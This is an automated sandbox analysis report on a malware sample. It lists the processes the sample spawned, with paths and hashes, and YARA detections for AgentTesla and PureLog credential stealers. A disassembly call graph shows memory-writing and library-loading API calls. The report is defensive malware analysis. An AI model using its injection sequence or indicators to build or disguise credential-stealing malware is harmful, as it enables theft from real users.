                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2555442502.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.2555442502.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.2553213718.0000000002F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                                                                                                Start time:04:24:58
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff632ac0000
                                                                                                                                                                                                                                                                                                                                File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                                                                                                Start time:04:25:05
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\Public\Libraries\Juqmtmya.PIF
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'226'752 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                                                                                Start time:04:25:08
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                                                                                                Start time:04:25:10
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3562156396.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3562156396.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3562156396.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3563552557.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3562156396.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3561235753.0000000002AD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3564025665.0000000005770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000002.3563972191.0000000005160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000003.2491911126.0000000000897000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3562156396.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                                                                                                Start time:04:25:10
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0xa80000
                                                                                                                                                                                                                                                                                                                                File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                                                                                                Start time:04:25:41
                                                                                                                                                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x1e0000
                                                                                                                                                                                                                                                                                                                                File size:665'670'656 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:1EFEA57D13329E8280EA1889052BFB56
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:16.1%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:8.5%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:21
                                                                                                                                                                                                                                                                                                                                  execution_graph 32585 2ddd2fc 32595 2db656c 32585->32595 32589 2ddd32a 32600 2ddc35c timeSetEvent 32589->32600 32591 2ddd334 32592 2ddd342 GetMessageA 32591->32592 32593 2ddd336 TranslateMessage DispatchMessageA 32592->32593 32594 2ddd352 32592->32594 32593->32592 32597 2db6577 32595->32597 32601 2db4198 32597->32601 32599 2db42ac SysFreeString SysReAllocStringLen SysAllocStringLen 32599->32589 32600->32591 32602 2db41de 32601->32602 32603 2db43e8 32602->32603 32604 2db4257 32602->32604 32607 2db4419 32603->32607 32610 2db442a 32603->32610 32615 2db4130 32604->32615 32620 2db435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 32607->32620 32609 2db4423 32609->32610 32611 2db446f FreeLibrary 32610->32611 32612 2db4493 32610->32612 32611->32610 32613 2db449c 32612->32613 32614 2db44a2 ExitProcess 32612->32614 32613->32614 32616 2db4173 32615->32616 32617 2db4140 32615->32617 32616->32599 32617->32616 32621 2db5868 32617->32621 32625 2db15cc 32617->32625 32620->32609 32622 2db5878 GetModuleFileNameA 32621->32622 32624 2db5894 32621->32624 32629 2db5acc GetModuleFileNameA RegOpenKeyExA 32622->32629 32624->32617 32648 2db1560 32625->32648 32627 2db15d4 VirtualAlloc 32628 2db15eb 32627->32628 32628->32617 32630 2db5b4f 32629->32630 32631 2db5b0f RegOpenKeyExA 32629->32631 32647 2db5908 12 API calls 32630->32647 32631->32630 32632 2db5b2d RegOpenKeyExA 32631->32632 32632->32630 32634 2db5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 32632->32634 32638 2db5c0f 32634->32638 32639 2db5cf2 32634->32639 32635 2db5b74 RegQueryValueExA 32636 2db5bb2 RegCloseKey 32635->32636 32637 2db5b94 RegQueryValueExA 32635->32637 32636->32624 32637->32636 32638->32639 32641 2db5c1f lstrlenA 32638->32641 32639->32624 32642 2db5c37 32641->32642 32642->32639 32643 2db5c5c lstrcpynA LoadLibraryExA 32642->32643 32644 2db5c84 32642->32644 32643->32644 32644->32639 32645 2db5c8e lstrcpynA LoadLibraryExA 32644->32645 32645->32639 32646 2db5cc0 lstrcpynA LoadLibraryExA 32645->32646 32646->32639 32647->32635 32649 2db1500 32648->32649 32649->32627 32650 2db4edc 32651 2db4ee9 32650->32651 32655 2db4ef0 32650->32655 32656 2db4c38 32651->32656 32662 2db4c50 32655->32662 32657 2db4c4c 32656->32657 32658 2db4c3c SysAllocStringLen 32656->32658 32657->32655 32658->32657 32659 2db4c30 32658->32659 32660 2db4f3c 32659->32660 32661 2db4f26 SysAllocStringLen 32659->32661 32660->32655 32661->32659 32661->32660 32663 2db4c5c 32662->32663 32664 2db4c56 SysFreeString 32662->32664 32664->32663 32665 2db1c6c 32666 2db1c7c 32665->32666 32667 2db1d04 32665->32667 32668 2db1c89 32666->32668 32669 2db1cc0 32666->32669 32670 2db1f58 32667->32670 32671 2db1d0d 32667->32671 32673 2db1c94 32668->32673 32713 2db1724 32668->32713 32672 2db1724 10 API calls 32669->32672 32674 2db1fec 32670->32674 32679 2db1f68 32670->32679 32680 2db1fac 32670->32680 32675 2db1d25 32671->32675 32689 2db1e24 32671->32689 32677 2db1cd7 32672->32677 32676 2db1d2c 32675->32676 32683 2db1d48 32675->32683 32687 2db1dfc 32675->32687 32700 2db1a8c 8 API calls 32677->32700 32703 2db1cfd 32677->32703 32685 2db1724 10 API calls 32679->32685 32684 2db1fb2 32680->32684 32688 2db1724 10 API calls 32680->32688 32681 2db1e7c 32682 2db1724 10 API calls 32681->32682 32697 2db1e95 32681->32697 32686 2db1f2c 32682->32686 32690 2db1d79 Sleep 32683->32690 32691 2db1d9c 32683->32691 32701 2db1f82 32685->32701 32686->32697 32706 2db1a8c 8 API calls 32686->32706 32692 2db1724 10 API calls 32687->32692 32705 2db1fc1 32688->32705 32689->32681 32693 2db1e55 Sleep 32689->32693 32689->32697 32690->32691 32695 2db1d91 Sleep 32690->32695 32707 2db1e05 32692->32707 32693->32681 32694 2db1e6f Sleep 32693->32694 32694->32689 32695->32683 32696 2db1ca1 32702 2db1cb9 32696->32702 32737 2db1a8c 32696->32737 32699 2db1e1d 32700->32703 32704 2db1a8c 8 API calls 32701->32704 32708 2db1fa7 32701->32708 32704->32708 32705->32708 32709 2db1a8c 8 API calls 32705->32709 32710 2db1f50 32706->32710 32707->32699 32711 2db1a8c 8 API calls 32707->32711 32712 2db1fe4 32709->32712 32711->32699 32714 2db1968 32713->32714 32715 2db173c 32713->32715 32716 2db1938 32714->32716 32717 2db1a80 32714->32717 32724 2db17cb Sleep 32715->32724 32725 2db174e 32715->32725 32723 2db1947 Sleep 32716->32723 32730 2db1986 32716->32730 32718 2db1a89 32717->32718 32719 2db1684 VirtualAlloc 32717->32719 32718->32696 32721 2db16bf 32719->32721 32722 2db16af 32719->32722 32720 2db175d 32720->32696 32721->32696 32754 2db1644 32722->32754 32728 2db195d Sleep 32723->32728 32723->32730 32724->32725 32729 2db17e4 Sleep 32724->32729 32725->32720 32726 2db182c 32725->32726 32731 2db180a Sleep 32725->32731 32735 2db15cc VirtualAlloc 32726->32735 32736 2db1838 32726->32736 32728->32716 32729->32715 32732 2db19a4 32730->32732 32733 2db15cc VirtualAlloc 32730->32733 32731->32726 32734 2db1820 Sleep 32731->32734 32732->32696 32733->32732 32734->32725 32735->32736 32736->32696 32738 2db1b6c 32737->32738 32739 2db1aa1 32737->32739 32740 2db16e8 32738->32740 32741 2db1aa7 32738->32741 32739->32741 32743 2db1b13 Sleep 32739->32743 32742 2db1c66 32740->32742 32745 2db1644 2 API calls 32740->32745 32744 2db1ab0 32741->32744 32747 2db1b4b Sleep 32741->32747 32751 2db1b81 32741->32751 32742->32702 32743->32741 32746 2db1b2d Sleep 32743->32746 32744->32702 32748 2db16f5 VirtualFree 32745->32748 32746->32739 32749 2db1b61 Sleep 32747->32749 32747->32751 32750 2db170d 32748->32750 32749->32741 32750->32702 32752 2db1c00 VirtualFree 32751->32752 32753 2db1ba4 32751->32753 32752->32702 32753->32702 32755 2db1681 32754->32755 32756 2db164d 32754->32756 32755->32721 32756->32755 32757 2db164f Sleep 32756->32757 32758 2db1664 32757->32758 32758->32755 32759 2db1668 Sleep 32758->32759 32759->32756 32760 2dd7074 33581 2db4860 32760->33581 33582 2db4871 33581->33582 33583 2db48ae 33582->33583 33584 2db4897 33582->33584 33599 2db45a0 33583->33599 33590 2db4bcc 33584->33590 33587 2db48df 33588 2db48a4 33588->33587 33604 2db4530 33588->33604 33591 2db4bd9 33590->33591 33598 2db4c09 33590->33598 33593 2db4c02 33591->33593 33594 2db4be5 33591->33594 33595 2db45a0 11 API calls 33593->33595 33610 2db2c44 11 API calls 33594->33610 33595->33598 33596 2db4bf3 33596->33588 33611 2db44dc 33598->33611 33600 2db45c8 33599->33600 33601 2db45a4 33599->33601 33600->33588 33624 2db2c10 33601->33624 33603 2db45b1 33603->33588 33605 2db4534 33604->33605 33608 2db4544 33604->33608 33607 2db45a0 11 API calls 33605->33607 33605->33608 33606 2db4572 33606->33587 33607->33608 33608->33606 33609 2db2c2c 11 API calls 33608->33609 33609->33606 33610->33596 33612 2db44fd 33611->33612 33613 2db44e2 33611->33613 33612->33596 33613->33612 33615 2db2c2c 33613->33615 33616 2db2c3a 33615->33616 33617 2db2c30 33615->33617 33616->33612 33617->33616 33618 2db2d19 33617->33618 33622 2db6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33617->33622 33623 2db2ce8 7 API calls 33618->33623 33621 2db2d3a 33621->33612 33622->33618 33623->33621 33625 2db2c27 33624->33625 33628 2db2c14 33624->33628 33625->33603 33626 2db2c1e 33626->33603 33627 2db2d19 33633 2db2ce8 7 API calls 33627->33633 33628->33626 33628->33627 33632 2db6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33628->33632 33631 2db2d3a 33631->33603 33632->33627 33633->33631 33634 2ddc350 33637 2dcf7c8 33634->33637 33638 2dcf7d0 33637->33638 33638->33638 33639 2dcf7d7 33638->33639 36051 2dc88b8 LoadLibraryW 33639->36051 33641 2dcf7f1 36056 2db2ee0 QueryPerformanceCounter 33641->36056 33643 2dcf7f6 33644 2dcf800 InetIsOffline 33643->33644 33645 2dcf80a 33644->33645 33646 2dcf81b 33644->33646 33647 2db4530 11 API calls 33645->33647 33648 2db4530 11 API calls 33646->33648 33649 2dcf819 33647->33649 33648->33649 33650 2db4860 11 API calls 33649->33650 33651 2dcf848 33650->33651 33652 2dcf850 33651->33652 33653 2dcf85a 33652->33653 36059 2db47ec 33653->36059 33655 2dcf873 33656 2dcf87b 33655->33656 33657 2dcf885 33656->33657 36074 2dc89d0 33657->36074 33660 2db4860 11 API calls 33661 2dcf8ac 33660->33661 33662 2dcf8b4 33661->33662 36087 2db46d4 33662->36087 36089 2dc8274 36051->36089 36053 2dc88f1 36100 2dc7d78 36053->36100 36057 2db2ef8 GetTickCount 36056->36057 36058 2db2eed 36056->36058 36057->33643 36058->33643 36060 2db4851 36059->36060 36061 2db47f0 36059->36061 36062 2db47f8 36061->36062 36063 2db4530 36061->36063 36062->36060 36065 2db4530 11 API calls 36062->36065 36068 2db4807 36062->36068 36066 2db45a0 11 API calls 36063->36066 36069 2db4544 36063->36069 36064 2db4572 36064->33655 36065->36068 36066->36069 36067 2db45a0 11 API calls 36071 2db4821 36067->36071 36068->36067 36069->36064 36070 2db2c2c 11 API calls 36069->36070 36070->36064 36072 2db4530 11 API calls 36071->36072 36073 2db484d 36072->36073 36073->33655 36075 2dc89e4 36074->36075 36076 2dc81cc 17 API calls 36075->36076 36077 2dc8a1d 36076->36077 36078 2dc8274 15 API calls 36077->36078 36079 2dc8a36 36078->36079 36080 2dc7d78 18 API calls 36079->36080 36081 2dc8a95 36080->36081 36136 2dc8338 36081->36136 36084 2dc8abc 36085 2db4500 11 API calls 36084->36085 36086 2dc8ac9 36085->36086 36086->33660 36088 2db46da 36087->36088 36088->36088 36090 2db4530 11 API calls 36089->36090 36091 2dc8299 36090->36091 36114 2dc798c 36091->36114 36094 2db47ec 11 API calls 36095 2dc82b3 36094->36095 36096 2dc82bb GetModuleHandleW GetProcAddress GetProcAddress 36095->36096 36097 2dc82ee 36096->36097 36120 2db4500 36097->36120 36101 2db4530 11 API calls 36100->36101 36102 2dc7d9d 36101->36102 36103 2dc798c 12 API calls 36102->36103 36104 2dc7daa 36103->36104 36105 2db47ec 11 API calls 36104->36105 36106 2dc7dba 36105->36106 36125 2dc81cc 36106->36125 36109 2dc8274 15 API calls 36110 2dc7dd3 NtWriteVirtualMemory 36109->36110 36111 2dc7dff 36110->36111 36112 2db4500 11 API calls 36111->36112 36113 2dc7e0c FreeLibrary 36112->36113 36113->33641 36115 2dc799d 36114->36115 36116 2db4bcc 11 API calls 36115->36116 36119 2dc79ad 36116->36119 36117 2dc7a19 36117->36094 36119->36117 36124 2dbbabc CharNextA 36119->36124 36122 2db4506 36120->36122 36121 2db452c 36121->36053 36122->36121 36123 2db2c2c 11 API calls 36122->36123 36123->36122 36124->36119 36126 2db4530 11 API calls 36125->36126 36127 2dc81ef 36126->36127 36128 2dc798c 12 API calls 36127->36128 36129 2dc81fc 36128->36129 36130 2dc8204 GetModuleHandleA 36129->36130 36131 2dc8274 15 API calls 36130->36131 36132 2dc8215 GetModuleHandleA 36131->36132 36133 2dc8233 36132->36133 36134 2db44dc 11 API calls 36133->36134 36135 2dc7dcd 36134->36135 36135->36109 36137 2db4530 11 API calls 36136->36137 36138 2dc835b 36137->36138 36139 2db4860 11 API calls 36138->36139 36140 2dc837a 36139->36140 36141 2dc81cc 17 API calls 36140->36141 36142 2dc838d 36141->36142 36143 2dc8274 15 API calls 36142->36143 36144 2dc8393 FlushInstructionCache 36143->36144 36145 2dc83b9 36144->36145 36146 2db44dc 11 API calls 36145->36146 36147 2dc83c1 FreeLibrary 36146->36147 36147->36084 36148 2dd3e12 36149 2db4860 11 API calls 36148->36149 36150 2dd3e33 36149->36150 36151 2dd3e4b 36150->36151 36152 2db47ec 11 API calls 36151->36152 36153 2dd3e6a 36152->36153 36154 2dd3e82 36153->36154 36155 2dc89d0 20 API calls 36154->36155 36156 2dd3e8e 36155->36156 37694 2dcf094 36156->37694 36159 2db4860 11 API calls 36160 2dd3ee0 36159->36160 36161 2dd3eeb 36160->36161 36162 2dd3ef7 36161->36162 36163 2db4860 11 API calls 36162->36163 36164 2dd3f18 36163->36164 36165 2dd3f23 36164->36165 36166 2dd3f30 36165->36166 36167 2db47ec 11 API calls 36166->36167 36168 2dd3f4f 36167->36168 36169 2dd3f67 36168->36169 36170 2dc89d0 20 API calls 36169->36170 36171 2dd3f73 36170->36171 36172 2db4860 11 API calls 36171->36172 36173 2dd3f94 36172->36173 36174 2dd3f9f 36173->36174 36175 2dd3fac 36174->36175 36176 2db47ec 11 API calls 36175->36176 36177 2dd3fcb 36176->36177 36178 2dd3fe3 36177->36178 36179 2dc89d0 20 API calls 36178->36179 36180 2dd3fef 36179->36180 36181 2db4860 11 API calls 36180->36181 36182 2dd4010 36181->36182 36183 2dd401b 36182->36183 36184 2dd4028 36183->36184 36185 2db47ec 11 API calls 36184->36185 36186 2dd4047 36185->36186 36187 2dd4052 36186->36187 36188 2dd405f 36187->36188 36189 2dc89d0 20 API calls 36188->36189 36190 2dd406b 36189->36190 37701 2dce358 36190->37701 36193 2dd4091 36194 2dd40a2 36193->36194 37706 2dcdc8c 36194->37706 36197 2db4860 11 API calls 36198 2dd40f1 36197->36198 36199 2dd40fc 36198->36199 36200 2db47ec 11 API calls 36199->36200 36201 2dd4128 36200->36201 36202 2dd4133 36201->36202 36203 2dc89d0 20 API calls 36202->36203 36204 2dd414c 36203->36204 36205 2db4860 11 API calls 36204->36205 36206 2dd416d 36205->36206 36207 2db47ec 11 API calls 36206->36207 36208 2dd41a4 36207->36208 36209 2dd41af 36208->36209 36210 2dc89d0 20 API calls 36209->36210 36211 2dd41c8 36210->36211 36212 2dc88b8 20 API calls 36211->36212 36213 2dd41cd 36212->36213 36214 2dd41d7 36213->36214 37721 2dce678 36214->37721 36217 2db4860 11 API calls 36218 2dd4217 36217->36218 36219 2dd422f 36218->36219 36220 2db47ec 11 API calls 36219->36220 36221 2dd424e 36220->36221 36222 2dd4259 36221->36222 36223 2dc89d0 20 API calls 36222->36223 36224 2dd4272 Sleep 36223->36224 36225 2db4860 11 API calls 36224->36225 36226 2dd429d 36225->36226 36227 2dd42b5 36226->36227 36228 2db47ec 11 API calls 36227->36228 36229 2dd42d4 36228->36229 36230 2dd42df 36229->36230 36231 2db46d4 36230->36231 36232 2dd42ec 36231->36232 36233 2dc89d0 20 API calls 36232->36233 36234 2dd42f8 36233->36234 36235 2db4860 11 API calls 36234->36235 36236 2dd4319 36235->36236 37860 2db49a0 36236->37860 36239 2db46d4 36240 2dd4331 36239->36240 36241 2db47ec 11 API calls 36240->36241 36242 2dd4350 36241->36242 36243 2dd435b 36242->36243 36244 2db46d4 36243->36244 36245 2dd4368 36244->36245 36246 2dc89d0 20 API calls 36245->36246 36247 2dd4374 36246->36247 36248 2db4860 11 API calls 36247->36248 36249 2dd4395 36248->36249 36250 2dd43a0 36249->36250 36251 2db46d4 36250->36251 36252 2dd43ad 36251->36252 36253 2db47ec 11 API calls 36252->36253 36254 2dd43cc 36253->36254 36255 2dd43d7 36254->36255 36256 2dd43e4 36255->36256 36257 2dc89d0 20 API calls 36256->36257 36258 2dd43f0 36257->36258 36259 2dd43ff 36258->36259 36260 2db4860 11 API calls 36259->36260 36261 2dd4420 36260->36261 36262 2db49a0 36261->36262 36263 2dd442b 36262->36263 36264 2db47ec 11 API calls 36263->36264 36265 2dd4457 36264->36265 36266 2dd4462 36265->36266 36267 2dd446f 36266->36267 36268 2dc89d0 20 API calls 36267->36268 36269 2dd447b 36268->36269 36270 2db4860 11 API calls 36269->36270 36271 2dd449c 36270->36271 36272 2db49a0 36271->36272 36273 2dd44a7 36272->36273 36274 2db46d4 36273->36274 36275 2dd44b4 36274->36275 36276 2db47ec 11 API calls 36275->36276 36277 2dd44d3 36276->36277 36278 2dd44de 36277->36278 36279 2dc89d0 20 API calls 36278->36279 36280 2dd44f7 36279->36280 36281 2db4860 11 API calls 36280->36281 36282 2dd4518 36281->36282 36283 2dd4523 36282->36283 36284 2db46d4 36283->36284 36285 2dd4530 36284->36285 36286 2db47ec 11 API calls 36285->36286 36287 2dd454f 36286->36287 36288 2db49a0 36287->36288 36289 2dd455a 36288->36289 36290 2dc89d0 20 API calls 36289->36290 36291 2dd4573 36290->36291 36292 2db4860 11 API calls 36291->36292 36293 2dd4594 36292->36293 36294 2db47ec 11 API calls 36293->36294 36295 2dd45b8 36294->36295 36296 2dd45c3 36295->36296 37862 2dc894c LoadLibraryW 36296->37862 36299 2db4860 11 API calls 36300 2dd45f1 36299->36300 36301 2db47ec 11 API calls 36300->36301 36302 2dd4615 36301->36302 36303 2db49a0 36302->36303 36304 2dd4620 36303->36304 36305 2dd4626 36304->36305 36306 2dc894c 21 API calls 36305->36306 36307 2dd462d 36306->36307 36308 2dc88b8 20 API calls 36307->36308 36309 2dd4632 36308->36309 36310 2db4860 11 API calls 36309->36310 36311 2dd4653 36310->36311 36312 2dd466b 36311->36312 36313 2db47ec 11 API calls 36312->36313 36314 2dd468a 36313->36314 36315 2dd4695 36314->36315 36316 2dd46a2 36315->36316 36317 2dc89d0 20 API calls 36316->36317 36318 2dd46ae 36317->36318 36319 2db4860 11 API calls 36318->36319 36320 2dd46cf 36319->36320 36321 2dd46e7 36320->36321 36322 2db47ec 11 API calls 36321->36322 36323 2dd4706 36322->36323 36324 2dd4711 36323->36324 36325 2dd471e 36324->36325 36326 2dc89d0 20 API calls 36325->36326 36327 2dd472a 36326->36327 36328 2db4860 11 API calls 36327->36328 36329 2dd474b 36328->36329 36330 2dd4763 36329->36330 36331 2db47ec 11 API calls 36330->36331 36332 2dd4782 36331->36332 36333 2dd479a 36332->36333 36334 2dc89d0 20 API calls 36333->36334 36335 2dd47a6 36334->36335 36336 2dce358 11 API calls 36335->36336 36337 2dd47bb 36336->36337 36338 2dd47dd 36337->36338 36339 2dd47f5 36338->36339 36340 2dcdc8c 17 API calls 36339->36340 36341 2dd4801 36340->36341 36342 2dc88b8 20 API calls 36341->36342 36343 2dd4806 36342->36343 36344 2dcf094 11 API calls 36343->36344 36345 2dd4816 36344->36345 36346 2db47ec 11 API calls 36345->36346 36347 2dd482c 36346->36347 36348 2dd4843 36347->36348 36349 2db4860 11 API calls 36348->36349 36350 2dd4864 36349->36350 36351 2dd486f 36350->36351 36352 2dd487c 36351->36352 36353 2db47ec 11 API calls 36352->36353 36354 2dd489b 36353->36354 36355 2dd48a6 36354->36355 36356 2dc89d0 20 API calls 36355->36356 36357 2dd48bf 36356->36357 36358 2db4860 11 API calls 36357->36358 36359 2dd48e0 36358->36359 36360 2db46d4 36359->36360 36361 2dd48f8 36360->36361 36362 2db47ec 11 API calls 36361->36362 36363 2dd4917 36362->36363 36364 2dd4922 36363->36364 36365 2dd492f 36364->36365 36366 2dc89d0 20 API calls 36365->36366 36367 2dd493b 36366->36367 36368 2db4860 11 API calls 36367->36368 36369 2dd495c 36368->36369 36370 2dd4967 36369->36370 36371 2db47ec 11 API calls 36370->36371 36372 2dd4993 36371->36372 36373 2dd499e 36372->36373 36374 2dc89d0 20 API calls 36373->36374 36375 2dd49b7 36374->36375 36376 2dc88b8 20 API calls 36375->36376 36377 2dd49bc 36376->36377 36378 2db4860 11 API calls 36377->36378 36379 2dd49dd 36378->36379 36380 2dd49f5 36379->36380 36381 2db47ec 11 API calls 36380->36381 36382 2dd4a14 36381->36382 36383 2dd4a1f 36382->36383 36384 2dd4a2c 36383->36384 36385 2dc89d0 20 API calls 36384->36385 36386 2dd4a38 36385->36386 36387 2db4860 11 API calls 36386->36387 36388 2dd4a59 36387->36388 36389 2db47ec 11 API calls 36388->36389 36390 2dd4a90 36389->36390 36391 2dc89d0 20 API calls 36390->36391 36392 2dd4ab4 36391->36392 36393 2db4860 11 API calls 36392->36393 36394 2dd4ad5 36393->36394 36395 2dd4aed 36394->36395 36396 2db47ec 11 API calls 36395->36396 36397 2dd4b0c 36396->36397 36398 2dd4b24 36397->36398 36399 2dc89d0 20 API calls 36398->36399 